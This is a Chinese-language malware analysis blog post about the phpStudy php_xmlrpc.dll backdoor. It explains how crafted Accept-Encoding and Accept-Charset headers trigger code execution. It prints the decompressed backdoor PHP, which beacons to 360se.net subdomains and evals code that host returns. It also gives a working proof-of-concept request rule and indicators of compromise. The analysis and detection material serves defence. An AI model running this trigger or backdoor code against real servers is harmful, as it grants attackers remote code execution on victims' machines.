phpstudy后门简单分析

感谢pcat师傅的文章：https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw

 

20号得知phphstudy有后门，不知道官网的是不是也被入侵了，当时没有进行查看，，，由于当时正在秋招面试比较忙，鸽了几天有了下文：

被中马的为php_xmlrpc.dll这个dll文件，这个可以通过查找泄露字符串很容易通过脚本实现，就不贴了，可以以eval为关键字来进行搜索

实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45存在后门

上图为IDA搜索字符串得到的数据，由此可以基本验证这个dll文件为可以文件，接下来要验证他的控制流

反向链接：判断ACCEPT_ENCODING如果等于compress,gzip，通过关键部分@eval(gzuncompress('%s'));可以看到拼接了一段恶意代码，然后调用gzuncompress方法执行解密

这里拼接了一个@eval（gzuncompress（'％s'））;的代码，明显是调用gzuncompress方法解密执行某些代码，没解密前的代码来自asc_1000D028到unk_1000D66C这个部分，拼接好的上方放在v44处，（gzuncompress很多时候可以用作木马免杀，龟龟）

正向连接：判断ACCEPT_ENCODING如果等于gzip,deflate，读取ACCEPT_CHARSE的内容做base64解密，交给zend_eval_strings()函数可以执行任意恶意代码。

zend_eval_string处执行V42处执行的代码，我们把数据提取出来，并进行处理，并且经过PHP的gzuncompress解码，得到以下

@ini_set("display_errors","0");
error_reporting(0);
$h = $_SERVER['HTTP_HOST'];
$p = $_SERVER['SERVER_PORT'];
$fp = fsockopen($h, $p, $errno, $errstr, 5);
if (!$fp) {
} else {
    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";
    $out .= "Host: {$h}\r\n";
    $out .= "Accept-Encoding: compress,gzip\r\n";
    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);
    fclose($fp);
}



@ini_set("display_errors","0");
error_reporting(0);
function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){
    $result = "";
  $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10); 
  if( !$handle ){
    $handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
    if( !$handle ){
        return "err";
    }
  }
  fwrite($handle, $sendMsg."\n");
    while(!feof($handle)){
        stream_set_timeout($handle, 2);
        $result .= fread($handle, 1024);
        $info = stream_get_meta_data($handle);
        if ($info['timed_out']) {
          break;
        }
     }
  fclose($handle); 
  return $result; 
}

$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("20123","40125","8080","80","53");
$n = false;
do {
    $n = false;
    foreach ($ds as $d){
        $b = false;
        foreach ($ps as $p){
            $result = tcpGet($i,$d.".360se.net",$p); 
            if ($result != "err"){
                $b =true;
                break;
            }
        }
        if ($b)break;
    }
    $info = explode("<^>",$result);
    if (count($info)==4){
        if (strpos($info[3],"/*Onemore*/") !== false){
            $info[3] = str_replace("/*Onemore*/","",$info[3]);
            $n=true;
        }
        @eval(base64_decode($info[3]));
    }
}while($n);

基本上就是fsockopen的通信，回连攻击者的$ip = '360se.net', $port = '20123'，中间一堆其他的条件

今天刚好到期

 

漏洞验证插件

name: poc-yaml-phpstudy-backdoor-rce
rules:
  - method: GET
    path: /index.php
    headers:
      Accept-Encoding: 'gzip,deflate'
      Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==
    follow_redirects: false
    expression: |
      body.bcontains(b'a5952fb670b54572bcec7440a554633e')
detail:
  author: 17bdw
  Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
  vuln_url: "php_xmlrpc.dll"
  links:
    - https://www.freebuf.com/column/214946.html

事件相关IOC

 

IP

133.130.101.150

Domain

360se.net

bbs.360se.net

www.360se.net

up.360se.net

down.360se.net

cms.360se.net

file.360se.net

ftp.360se.net

MD5

0f7ad38e7a9857523dfbce4bce43a9e9